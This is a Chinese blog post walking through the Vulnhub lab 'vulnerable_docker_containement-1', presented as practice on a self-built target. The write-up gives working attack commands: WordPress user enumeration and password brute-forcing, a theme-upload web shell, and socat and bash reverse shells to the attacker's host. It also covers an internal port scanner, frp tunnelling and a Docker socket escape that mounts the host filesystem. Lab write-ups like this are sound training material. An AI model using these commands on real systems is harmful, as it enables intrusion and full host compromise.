【甄选靶场】 Vulnhub百个项目渗透——项目三十五:vulnerable_docker_containement-1(文件上传,docker提权)

最新推荐文章于 2024-05-16 09:50:33 发布
最新推荐文章于 2024-05-16 09:50:33 发布
阅读量725 收藏 2
点赞数 1
分类专栏: vulnhub百个项目渗透 文章标签: docker python linux 网络安全 vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65527369/article/details/127201570
版权

Vulnhub百个项目渗透

Vulnhub百个项目渗透——项目三十五:vulnerable_docker_containement-1(文件上传,docker提权)

🔥系列专栏:Vulnhub百个项目渗透
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年10月8日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

巅峰之路

前言

本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。

信息收集

nmap -sS -sV -A -T5 [ip]

在这里插入图片描述
发现了8000的web,并且是wordpress,那就用wpscan

wpscan利用

wpscan --url http://192.168.253.182:8000/ -eu
存在:bob用户

dirb http://192.168.253.182:8000/
发现登录页面
http://192.168.253.182:8000/admin
在这里插入图片描述
用户名枚举出bob

WPForce爆破

WPForce爆破:
https://github.com/n00py/WPForce
proxychains4 git clone https://github.com/n00py/WPForce.git

密码字典合集:
https://github.com/danielmiessler/SecLists

把bob写到user.txt中
python wpforce.py -i user.txt -w 10-million-password-list-top-10000.txt -u http://192.168.253.182:8000/

{'bob': 'Welcome1'}
---------
或者用wpscan、bp也可以!

wp文件上传

已经做了很多次了,apperence->add new,然后就能看到地址,本地开个端口接shell然后访问url即可

在这里插入图片描述

这里可以再反弹一下,生成稳定shell

没有装wget,所以用curl
curl -O http://192.168.253.138:8082/socat
chmod +x socat

nc -vlp 9998
HOME=/dev/shm ./socat tcp:192.168.253.138:9998 exec:'/bin/bash -li',pty,stderr,sigint,sighup,sigquit,sane

使用script:(没太大必要)
script -qc bash /dev/null

stty raw -echo
fg

提权

没有wget 利用curl上传提权三脚本

curl -# -O http://192.168.253.138:8082/linpeas.sh

在这里插入图片描述

1)Linux version 3.13.0-128-generic (无法内核提权)

2)多个网卡信息:
172.18.0.1 dev eth0 lladdr 02:42:78:42:eb:c8 REACHABLE
172.18.0.4 dev eth0 lladdr 02:42:ac:12:00:04 REACHABLE IP address HW type Flags HW address Mask Device
172.18.0.1 0x1 0x2 02:42:78:42:eb:c8 * eth0
172.18.0.4 0x1 0x2 02:42:ac:12:00:04 * eth0

3)mysql信息泄露: /var/www/html/wp-config.php define(‘DB_NAME’,
‘wordpress’); define(‘DB_USER’, ‘wordpress’); define(‘DB_PASSWORD’,
‘WordPressISBest’); define(‘DB_HOST’, ‘db:3306’); define(
‘WP_SITEURL’, ‘http://’ . $_SERVER[‘HTTP_HOST’] ); define( ‘WP_HOME’,
‘http://’ . $_SERVER[‘HTTP_HOST’] );

4)Current: = cap_chown

无法内核提权,也没有sudo滥用,多网卡是开启了docker,靶场名字也有提示。那就看一下内网第一台机器的ip,因为ifconfig被禁用了

在这里插入图片描述

深入探测

手工探测IP
for i in {1..254}; do (ping -c 1 172.18.0.${i} | grep "bytes from" | grep -v "Unreachable" &); done;
手工探测端口

本地写好传上去赋权执行

#!/bin/bash
hosts=(
"172.18.0.1"
"172.18.0.2"
"172.18.0.3"
"172.18.0.4"
)
END=65535
for host in "${hosts[@]}"
do
	   echo "==============================="
	   echo "Scanning $host"
	   echo "==============================="
	       for ((port=1;port<=END;port++))
	       do
	       echo "" > /dev/tcp/$host/$port && echo "Port $port is open"
	done 2>/dev/null
done

在这里插入图片描述

得到结果如下

在这里插入图片描述

内网穿越

利用frpc

  1. 修改frpc.ini
  2. 赋权执行frps
  3. 上传frpc以及frpc.ini
  4. 赋权执行frpc
./frps -c frps.ini     ---本机执行
./frpc -c frpc.ini       --curl上传到
gedit /etc/proxychains4.conf   --本机(或者proxychains.conf )
最后一行加上:socks5 192.168.253.138 7777

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

proxychains nmap -sT -sV -Pn -n -p8022 172.18.0.3

在这里插入图片描述

在经过尝试之后,锁定了这台开有8022的机器

在这里插入图片描述

浏览器插件中添加代理

在这里插入图片描述

发现是一个docker的shell
受限很大,考虑端口转发

bash -i >& /dev/tcp/192.168.247.129/6666 0>&1

在这里插入图片描述

在这里插入图片描述
拿到shell以后,发现了在run目录下有docker.sock
基本判定存在 Docker Remote api漏洞
再查看一下宿主其他容器
发现没有装docker

安装docker

vim /etc/apt/sources.list
apt-get update
apt-get install docker.io
docker ps

挂载主机上的所有文件到一个目录
docker run --rm -it -v /:/tmp/1/ wordpress /bin/bash
或
docker run -v /:/host -t -i bash

在这里插入图片描述

人间体佐菲
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sudo提权,脏牛提权利用,文件上传漏洞
weixin_73452725的博客
12-06 203
尝试登录后台http://IP/wolfcms/?/admin进行访问发现可以登录猜测账户:admin密码:123456或者账户admin密码admin弱口令。nmap扫描目标机的ip开放端口:sudo nmap -sS -A IP,发现开放22,3128,8080三个端口。3128代理服务器端口80访问不了可以通过修改ip为靶机ip端口代理来进行查看。发现有一个wolfcms目录接着访问http://ip/wolfcms。直接访问http://ip/robots.txt。查看/home文件发现存在账户。
vulnhub靶场——VULNERABLE DOCKER: 1 Easy
Czheisenberg的博客
09-26 2001
ULNERABLE DOCKER: 1 Easy 渗透过程。须要利用到内网穿透工具来打内网。
探索WPForce:Wordpress攻击工具套件
最新发布
gitblog_00037的博客
05-16 331
探索WPForce:Wordpress攻击工具套件 项目地址:https://gitcode.com/n00py/WPForce WPForce 是一个强大的WordPress攻击工具集,目前包括两个脚本——WPForce和Yertle。前者利用API进行暴力破解登录,而后者则在获取管理员权限后上传shell,提供多种后渗透利用选项。 关于WPForce: 该项目的初衷是为了测试WordPres...
docker环境下安装使用vulhub靶场
Goodric的博客
07-25 1611
Vulhub是一个基于dockerdocker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。docker-compose会自动查找当前目录下的配置文件(默认文件名为docker-compose.yml),并根据其内容编译镜像和启动容器。所以,要运行某个漏洞靶场,需要先进入该漏洞所在的目录。首先要在Linux中有和环境,安装过程这里就不讲述了。——...
docker容器中安装vulhub靶场环境
勤劳的码农的博客
03-11 1326
是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。让漏洞复现变得更加简单,让对安全感兴趣的人员更加专注于漏洞原理本身。是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的Linux机器上,也可以实现虚拟化,容器是完全使用沙箱机制,相互之间不会有任何接口。通过对应用组件的封装、分发、部署、运行等生命周期的管理,达到应用组件级别的“一次封装,到处运行”。
No.35-VulnHub-Vulnerable Docker: 1-Walkthrough渗透学习
qq_34801745的博客
01-28 1343
** VulnHub-Vulnerable Docker: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/vulnerable-docker-1,208/ 靶机难度:初级(CTF) 靶机发布日期:2017年9月27日 靶机描述: 是否曾经幻想过在容器中使用docker配置错误,权限提升等问题? 下载此虚拟机,拔出笔尖的帽子并开始使用 我们有...
SSRF_Vulnerable_Lab-master.zip
10-21
备份,github:https://github.com/incredibleindishell/SSRF_Vulnerable_Lab
vulnerable-node:一个用NodeJS编写的非常易受攻击的网站,目的是拥有一个已确定漏洞的项目,以测试安全分析器工具的质量
04-29
脆弱节点 脆弱节点:用NodeJS编写的非常脆弱的网站代码名称聚苯乙烯版本1.0 代码 问题 作者丹尼尔·加西亚(cr0hn)-@ggdaniel支持这个项目通过应用Github的“赞助商”按钮来支持该项目(解决问题,新功能...)。...
Python网络安全项目开发实战_看清文件上传木马_编程案例解析实例详解课程教程.pdf
04-27
网络安全领域,文件上传木马是一个重要的议题,尤其在Python网络安全项目开发中。黑客常常利用文件上传漏洞来植入木马,以控制服务器。文件上传木马的类型主要分为大马和小马,根据文件大小来区分。小马通常用于...
SSRF_Vulnerable_Lab:本实验包含易受服务器端请求伪造攻击的示例代码
05-12
我想对@ albinowax,AKReddy,Vivek Sir(感谢一直以来支持我的杰出人物),Andrew Sir-@vanderaj(感谢他的鼓励)以及在DNS重新绑定攻击基础上共同努力的研究人员说谢谢 脆弱代码旨在针对以下5种情况演示SSRF: 1....
owasp-webgoat-dot-net-docker:用于运行OWASP WebGoat.NET应用程序的Docker容器
05-16
OWASP WebGoat.NET Docker容器OWASP WebGoat.NET是故意破坏的ASP.NET Web应用程序。 它包含许多常见漏洞,旨在用于教室环境。 有关更多详细信息,请参阅 。使用Docker容器所需的软件码头工人使用容器的步骤docker ...
靶场练习:wordpress后台破解
zh的博客
10-11 1011
靶场地址:http://whalwl.icu:8090/ 解题准备:本题需要使用wpsan,kali自带 解题思路: 1、kali --> wpscan-->破解用户名 wpscan --url http://whalwl.icu:8090/ --enumerate u 2、拿到爆出的用户名,使用本题提供的字典爆密码,即可拿到后台账号密码 wpscan --url http://whalwl.icu:8090/ -U whalwlweb -P /root/dict.tx.
关于Linux环境下的LXD及Docker提权
qq_46081990的博客
03-22 1618
Docker是一个开源的容器化平台,它建立在LXC之上,并提供了一套更高级别的工具和API,使得容器的构建、分发和运行变得更加简单。LXD主要面向系统级容器,可以运行完整的操作系统镜像,并提供类似于虚拟机的环境。上述提权方案只是对宿主机目录有了操作权限,如果此时反弹 shell 得到的权限将是容器内的 root 权限,而非宿主机的 root 权限,显然不是我们想要的。拉取镜像,创建容器,将宿主机的根目录 "/" 挂载到容器中的 "/mnt" 目录,进入 /mnt/root 目录查看便可得到 flag`
linux定时任务打包提权&docker提权
m0_62207170的博客
03-03 689
linux定时任务打包提权&docker提权
【HTB系列】靶机Netmon的渗透测试
大方子
07-11 1666
总结和反思: 1. win中执行powershell的远程代码下载执行注意双引号转义 2. 对powershell代码先转为windows上默认的Unicode编码方式(UTF-16LE)再转为 base64执行,防止代码内容被破坏 3. 学会查CVE漏洞 4. 通过命令行把终端内容保存到剪切板中 5. 运维人员密码修改的规律,仅仅修改了密码中的年份,这是设置新密码常用的思路 K...
DVWA windows提权
a1371688168的博客
07-22 1255
DVWA windows提权
WEBSHELL姿势之文件上传漏洞(渗透实验)
热门推荐
forbidd3n,keep going
10-14 1万+
实验场景  某互联网公司授权你对其网络安全进行模拟黑客攻击渗透。在XX年XX月XX 日至XX年XX月XX日,对某核心服务器进行入侵测试,据了解,该web服务器(10.1.1.178)上 C:\consle存储有银行的关键敏感数据。 目标任务       请以下列任务为目标进行入侵渗透 :       1、利用网站漏洞获取该服务器shell;(网页关入侵--铜牌任务)
linux~Docker容器提权
@小张小张的博客
11-06 4727
Docker容器的特点: 1.轻量级 在机器上运行的Docker容器共享该机器的操作系统内核; 他们使用更少的计算和内存。图像由文件系统层构建并共享公用文件。最大限度地减少了磁盘使用量。 2.标准 Docker容器基于开放标准,可在Linux发行版,Microsoft Windows以及任何基础架构(包括虚拟机,裸机)上运行。 3.安全 Docker容器将应用程序彼此隔离并从底层基础架构中分离出来。提供了最强大的默认隔离功能,可以将应用程序问题限制在一个容器中,而不是整个机器上。 关于docker提权
docker容器有个bug-非root用户提权
m0_67402235的博客
06-02 325
本系列之前的文章中使用root用户安装docker,并在root用户下启动docker守护进程,容器也是在root用户下启动运行的。那么问题就出现了:我们的容器服务进程都是root用户权限,使用数据卷的方式想挂载哪个目录就挂载那个目录;想修改挂载目录下的哪个文件,就修改哪个文件。 那么我们本文带大家使用非root用户来启动docker容器,是否就安全了呢? 我们先不说答案,让我们一起来通过实验,来解答我们的疑问。为了提升安全性,我们考虑一种方案:使用非root用户启动docker容器。为此我们做一个实验,首
def cooldowns(self): current_time = pygame.time.get_ticks() if not self.can_attack: if current_time - self.attack_time >= self.attack_cooldown: self.can_attack = True if not self.vulnerable: if current_time - self.hit_time >= self.invincibility_duration: self.vulnerable = True对此代码进行注解
06-03
代码中的 `can_attack` 和 `vulnerable` 变量分别表示是否能够攻击和是否处于无敌状态。 在代码中,首先判断角色是否能够攻击。如果不能攻击,则判断距离上次攻击是否已经过了攻击冷却时间。如果已经过了攻击冷却...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

人间体佐菲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值